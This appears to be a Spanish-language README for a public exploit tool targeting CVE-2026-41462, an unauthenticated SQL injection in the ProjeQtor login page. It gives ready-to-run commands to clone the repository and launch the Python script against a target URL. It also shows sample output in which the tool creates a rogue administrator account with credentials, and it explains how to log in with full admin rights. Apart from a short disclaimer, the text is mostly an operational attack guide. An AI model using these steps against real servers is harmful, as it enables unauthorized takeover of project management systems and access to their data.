
CVE-2026-41462
Inyección SQL crítica no autenticada en ProjeQtor ≤ 12.4.3
CVE-2026-41462 es una vulnerabilidad crítica de inyección SQL no autenticada en la funcionalidad de inicio de sesión de la herramienta de gestión de proyectos ProjeQtor.
python3 CVE-2026-41462.py -u http://target.com --create-admin
# With custom credentials
python3 CVE-2026-41462.py -u http://target.com --create-admin \
--username admin123 --password StrongPass2026!
Cuando el exploit tenga éxito, verás una salida similar a esta:
[+] Targeting: http://target.com
[+] Sending payload to create admin user 'hacker' ...
[+] Request sent successfully.
[+] New admin created → Username: hacker | Password: Admin123!
[+] Try logging in at: http://target.com/login.php
Abre tu navegador y ve a:
http://target.com/login.php
Inicia sesión con las credenciales que se muestran en la salida del script.
Si tiene éxito, accederás al Panel de administración de ProjeQtor con privilegios administrativos completos.
Indicadores de éxito:
| Archivo | Descripción |
|---|---|
CVE-2026-41462.py | Script principal de explotación |
CVE-2026-41462.yaml | Plantilla de detección para Nuclei |
README.md | Esta documentación |
Clona el repositorio:
git clone https://github.com/0xBlackash/CVE-2026-41462.git
cd CVE-2026-41462
Ejecuta el exploit:
python3 CVE-2026-41462.py -u http://target.com --create-admin
Inicia sesión con la cuenta de administrador recién creada.
Esta herramienta está destinada únicamente a fines educativos y pruebas de penetración autorizadas. El uso no autorizado es ilegal.